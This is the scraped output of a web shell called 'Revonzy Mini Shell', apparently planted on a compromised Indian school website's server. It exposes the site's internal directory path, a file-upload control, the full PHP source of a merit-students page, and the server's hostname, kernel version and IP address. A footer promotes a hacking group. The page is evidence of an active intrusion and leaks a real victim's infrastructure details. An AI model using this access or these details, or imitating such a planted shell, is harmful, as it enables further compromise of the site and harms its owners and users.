Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/www/panel.atsevairag.com/old2/old-11-10-2024/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/www/panel.atsevairag.com/old2/old-11-10-2024/merit-students.php

<!--
	Powered By - Dream Technology, Solapur.
	Contact No : +91 9595775120
	Email ID - dream.technology@outlook.com
-->
<?php
	require_once('lib/class/functions.php');
	$db = new functions();
	
	$current_page = "";
?>
<DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<title>ए. टी. एस. ई. वैराग</title>
	<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>    
</head>
<body>	
	
	<?php
		require_once("lib/header.php");
	?>
		
	<div name="tab_container">
		<div class="main_container" style="min-height:710px;">
		<div class="page_highlighter">राज्य स्तरीय गुणवत्ता धारक विध्यार्थी</div>
			
        <?php
			require_once("highlights.php");
		?>
			
		<div class="data_container" style="background-color:#FFFFFF; margin-top:19px;">
		<?php
			$merit_data	=	array();
			
			$merit_data	=	$db->get_all_merit_students_records();
			
			if(!empty($merit_data))
			{
				$count = 0;
				foreach($merit_data as $data)
				{
					$current_img_id	=	$merit_data[$count][0];
					$student_name	=	$merit_data[$count][1];
					$standard		=	$merit_data[$count][2];
					$jilha			=	$merit_data[$count][3];
					$merit_status	=	$merit_data[$count][4];
					$student_image	=	$merit_data[$count][5];
					$date			=	$merit_data[$count][6];
					$time			=	$merit_data[$count][7];
		?>
			<div class="merit_stud_info_contnr">
				<img src="/merit-students-images/<?php echo $student_image; ?>" class="merit_stud_prof_img" /><br />
				<div class="merit_stud_info">
				<div class="merit_stud_name"><?php echo $student_name; ?></div>
				<div class="merit_stud_other_details">इयत्ता <?php echo $standard.", ".$jilha; if($merit_status!=""){ echo " (".$merit_status.")"; }?></div>
				</div>				
			</div>
		<?php
					$count++;
				}
			}
			else
			{
		?>
					<div class="no_img" style="margin-top:15px;">
						मेरिट यादी लागली नाही / उपलब्ध नाही 
					</div>
		<?php
			}
		?>
		
				
			</div>
			
		</div>
			
	</div>
			
	<?php
		require_once("lib/footer.php");
	?>
</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4